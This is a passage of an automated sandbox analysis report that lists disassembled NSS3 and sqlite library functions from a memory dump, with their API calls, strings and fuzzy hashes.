PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CEA4DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CEA4E02

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 9f80b8064602d82510c65fa5b41b68acca5ebac6fcbfcac3bd189713e6d95e58
Instruction ID: 27b26fd0cdf565b01bf8af345722ea1c8cfe7b9c19fef7174882a75a6bbed315
Opcode Fuzzy Hash: 9f80b8064602d82510c65fa5b41b68acca5ebac6fcbfcac3bd189713e6d95e58
Instruction Fuzzy Hash: 3441A7B6D00605AFEB019F68EC40A5677B8AF0521DF255175EC088BB12EF31D955C7E2

Function 6CE8BFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CE8BFFB

Part of subcall function 6CEE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1000
Part of subcall function 6CEE0FF0: PR_NewLock.NSS3(?,00000800,6CE7EF74,00000000), ref: 6CEE1016
Part of subcall function 6CEE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE887ED,00000008,?,00000800,6CE7EF74,00000000), ref: 6CEE102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6CE8C015

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6CE8C032
DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6CE8C04D

Part of subcall function 6CED69E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CED6A47
Part of subcall function 6CED69E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6CED6A64

DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6CE8C064
CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6CE8C07B

Part of subcall function 6CE88980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6CE87310), ref: 6CE889B8
Part of subcall function 6CE88980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6CE87310), ref: 6CE889E6
Part of subcall function 6CE88980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6CE88A00
Part of subcall function 6CE88980: CERT_CopyRDN.NSS3(00000004,00000000,6CE87310,?,?,00000004,?), ref: 6CE88A1B
Part of subcall function 6CE88980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6CE88A74

Part of subcall function 6CE81D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6CE8C097,00000000,000000B0,?), ref: 6CE81D2C
Part of subcall function 6CE81D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6CE8C09B,00000000,00000000,00000000,?,6CE8C097,00000000,000000B0,?), ref: 6CE81D3F
Part of subcall function 6CE81D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6CE8C087,00000000,000000B0,?), ref: 6CE81D54

CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6CE8C0AD
SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6CE8C0C9

Part of subcall function 6CE92DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6CE8C0D2,6CE8C0CE,00000000,-000000D4,?), ref: 6CE92DF5
Part of subcall function 6CE92DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6CE8C0CE,00000000,-000000D4,?), ref: 6CE92E27

CERT_DestroyCertificate.NSS3(00000000), ref: 6CE8C0D6
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE8C0E3

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
String ID:
API String ID: 3955726912-0
Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction ID: 71002b15c70f0e292e1e140bbb5964436dd7db62d85fcf8881ca059a7469b6d2
Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction Fuzzy Hash: D32177B264210567FB015A61AC81FFB327C9B4279CF284238FD0CD9747FB25D5199272

Function 6CE82E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CE82CDA,?,00000000), ref: 6CE82E1E

Part of subcall function 6CEDFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CE89003,?), ref: 6CEDFD91
Part of subcall function 6CEDFD80: PORT_Alloc_Util.NSS3(A4686CEE,?), ref: 6CEDFDA2
Part of subcall function 6CEDFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CEE,?,?), ref: 6CEDFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CE82E33

Part of subcall function 6CEDFD80: free.MOZGLUE(00000000,?,?), ref: 6CEDFDD1

TlsGetValue.KERNEL32 ref: 6CE82E4E
EnterCriticalSection.KERNEL32(?), ref: 6CE82E5E
PL_HashTableLookup.NSS3(?), ref: 6CE82E71
PL_HashTableRemove.NSS3(?), ref: 6CE82E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6CE82E96
PR_Unlock.NSS3 ref: 6CE82EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE82EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE82EC5

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: ec6709c6593f403efe65305ef5336d63134fffcd0c3465ca8e33dba8e1632854
Instruction ID: 1bbf0a8c467ba439dc40059ddbaff6b1ebb32bad8c3855d9d4b8ee1f46cd7e30
Opcode Fuzzy Hash: ec6709c6593f403efe65305ef5336d63134fffcd0c3465ca8e33dba8e1632854
Instruction Fuzzy Hash: 07213772E00101A7EF515B24EC09B9A3B78DB5631DF280034EE1C96751FB33D559C2B1

Function 6CE6FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CE6FD18
sqlite3_initialize.NSS3 ref: 6CE6FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CE6FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CE6FD99
sqlite3_free.NSS3(00000000), ref: 6CE6FE3C
sqlite3_free.NSS3(?), ref: 6CE6FEE3
sqlite3_free.NSS3(?), ref: 6CE6FEEE

Strings

simple, xrefs: 6CE6FC79

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: 0cfa8f8c626b0661e970170a361ebffb1cdfe3e46e69e47be300fcb574fbf835
Instruction ID: 3a60f9d89951e6c9f7999bffe0bfb3d4e19cb9da90d99f211c4f7b45622f2b8b
Opcode Fuzzy Hash: 0cfa8f8c626b0661e970170a361ebffb1cdfe3e46e69e47be300fcb574fbf835
Instruction Fuzzy Hash: 5F9181B0A512059FDB04CF56C880BAABBB2FF85318F34C56DD8199BB52D739E811CB90

Function 6CE75CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CE75EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE75EED

Strings

unable to close due to unfinalized statements or unfinished backups, xrefs: 6CE75E64
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE75ED1
misuse, xrefs: 6CE75EDB
invalid, xrefs: 6CE75EBE
%s at line %d of [%.10s], xrefs: 6CE75EE0
API call with %s database connection pointer, xrefs: 6CE75EC3

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: 8ddbbab9b660893cac60752f5824c64b5c952868684a4000120bdac276a762e1
Instruction ID: e59b6b30c453aa23de141430c3c109429888d582c7d7de2bd3542f91194a09f2
Opcode Fuzzy Hash: 8ddbbab9b660893cac60752f5824c64b5c952868684a4000120bdac276a762e1
Instruction Fuzzy Hash: 5481BC70B076129BEB298E25C948BAAB771BF4230CF38066DD9155BB41D730E852CBE1

Function 6CE5DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE5DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE5DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE5DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CE5DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE5DF78

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE5DE52, 6CE5DE81
database corruption, xrefs: 6CE5DE5C, 6CE5DE8B
%s at line %d of [%.10s], xrefs: 6CE5DE61, 6CE5DE90

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: e21c677ef5250fb6ac6f25f2f8f020e0e794f96b1414ae1450ab3e5914963b8e
Instruction ID: 3cff5a0dddb93c9148cca00baa751e95f041db0c01b358b7bc0c12b5e5cd8107
Opcode Fuzzy Hash: e21c677ef5250fb6ac6f25f2f8f020e0e794f96b1414ae1450ab3e5914963b8e
Instruction Fuzzy Hash: C381E1797043009FD704CF25C980B6A77F1BF45308F64892DE99A8BB51EB32EA56CB52

Function 6CE0CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CE0B999), ref: 6CE0CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CE0B999), ref: 6CE0D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CE0B999), ref: 6CE0D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CE0B999), ref: 6CF5972B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE0CFDD, 6CE0D00E, 6CE0D022, 6CE0D033, 6CF59780
database corruption, xrefs: 6CE0CFE7, 6CE0D013, 6CE0D028, 6CE0D039, 6CE0D03E, 6CF59786
%s at line %d of [%.10s], xrefs: 6CE0CFEC, 6CE0D018, 6CE0D029, 6CE0D03F, 6CF5978B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 1f4ecbb2c414d4a255e9d93bb45f26677c0f6ec6f1c7cdb9add0583c6789c021
Instruction ID: 2f4843f46be15f9ffa55a061c9cb709524042ad70f4ecfad49b2ae41296c3d47
Opcode Fuzzy Hash: 1f4ecbb2c414d4a255e9d93bb45f26677c0f6ec6f1c7cdb9add0583c6789c021
Instruction Fuzzy Hash: E5611871A042108FD310CF2AC841BA6BBF6EF55318F68456EE5489BB42D376E947C7E2

Function 6CF0FFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CF15B40: PR_GetIdentitiesLayer.NSS3 ref: 6CF15B56

PK11_FreeSymKey.NSS3(00000000), ref: 6CF10113
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF10130
PORT_Alloc_Util.NSS3(00000040), ref: 6CF1015D
memcpy.VCRUNTIME140(-00000042,?,?), ref: 6CF101AF
PR_SetError.NSS3(FFFFD056,00000000), ref: 6CF10202
free.MOZGLUE(?), ref: 6CF10224
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF10253

Strings

exporter, xrefs: 6CF100F7

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
String ID: exporter
API String ID: 712147604-111224270
Opcode ID: 3b615e92489fdf9d43921fdc8386beef7eb19422d2f437758d61842a41b344f5
Instruction ID: a11bd9f9961e466c87a17999f603c6c5ac5af7722762c9c7f43bbf62efbb4744
Opcode Fuzzy Hash: 3b615e92489fdf9d43921fdc8386beef7eb19422d2f437758d61842a41b344f5
Instruction Fuzzy Hash: FA612471D087899BEF018FA4CC00BEE77B6BF4431CF15412CED1A6AA51EB75A964C741

Function 6CEE4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CEE536F,00000022,?,?,00000000,?), ref: 6CEE4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6CEE4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CEE4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CEE4FAE
free.MOZGLUE(?), ref: 6CEE4FC8

Strings

%s=%s, xrefs: 6CEE4F89
%s=%c%s%c, xrefs: 6CEE4FA9
oSl", xrefs: 6CEE4DFB, 6CEE4EF4, 6CEE4EC5

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSl"
API String ID: 2709355791-450401312
Opcode ID: 4894cdc204839c35b4c72acd54bacb5a22fbfb937e8a773702691aff78392081
Instruction ID: ef84d67fcb8d112e0600fdfd96f30755ed6f3d8f25fff9d5d03a18b6fa5baeaf
Opcode Fuzzy Hash: 4894cdc204839c35b4c72acd54bacb5a22fbfb937e8a773702691aff78392081
Instruction Fuzzy Hash: 6F512721E051498BEB01CAEA84917FF7BF59F4E38CF398167E894ABB50D3359805C791

Function 6CF0EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6CF2A4A1,?,00000000,?,00000001), ref: 6CF0EF6D

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

htonl.WSOCK32(00000000,?,6CF2A4A1,?,00000000,?,00000001), ref: 6CF0EFE4
htonl.WSOCK32(?,00000000,?,6CF2A4A1,?,00000000,?,00000001), ref: 6CF0EFF1
memcpy.VCRUNTIME140(?,?,6CF2A4A1,?,00000000,?,6CF2A4A1,?,00000000,?,00000001), ref: 6CF0F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6CF2A4A1,?,00000000,?,00000001), ref: 6CF0F027

Strings

dtls13, xrefs: 6CF0EF33

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: ea26591181e87a11f003512b34d0e45fe33cf49d7e2a6568d87cfcff3332fcf3
Instruction ID: bd3632431d34ef84ad1e8120e34270bdde91f21dc15c0d6b35578b43887e54a9
Opcode Fuzzy Hash: ea26591181e87a11f003512b34d0e45fe33cf49d7e2a6568d87cfcff3332fcf3
Instruction Fuzzy Hash: 1F311471A00211AFDB10DF38DC50B8AB7E4FF48749F158029E8589B751E731E915CBE1

Function 6CE8AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE8AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CFA9500,6CE83F91), ref: 6CE8AFD2

Part of subcall function 6CEDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CFB18D0,?), ref: 6CEDB095

DER_GetInteger_Util.NSS3(?), ref: 6CE8B007

Part of subcall function 6CED6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6CE81666,?,6CE8B00C,?), ref: 6CED6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6CE8B02F
PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CE8B046
PL_FreeArenaPool.NSS3 ref: 6CE8B058
PL_FinishArenaPool.NSS3 ref: 6CE8B060

Strings

security, xrefs: 6CE8AFB8

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 0c7419708a988b32be2df8bbd1632f48e165764745e3b1124659837124def612
Instruction ID: 3f5afa2383b71bb5e0289f46d62dbde8db16ee4676b2005cf753fc7c45a6fb0c
Opcode Fuzzy Hash: 0c7419708a988b32be2df8bbd1632f48e165764745e3b1124659837124def612
Instruction Fuzzy Hash: B6310871805300DBD7108F249C45BAA77B4AF8A36CF30061DE9B89BBD1E7329509C797

Function 6CE83E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 6CE840D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CE83F7F,?,00000055,?,?,6CE81666,?,?), ref: 6CE840D9
Part of subcall function 6CE840D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CE81666,?,?), ref: 6CE840FC
Part of subcall function 6CE840D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CE81666,?,?), ref: 6CE84138

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE83EC2
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE83ED6

Part of subcall function 6CEDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CFB18D0,?), ref: 6CEDB095

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE83EEE

Part of subcall function 6CEDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CED8D2D,?,00000000,?), ref: 6CEDFB85
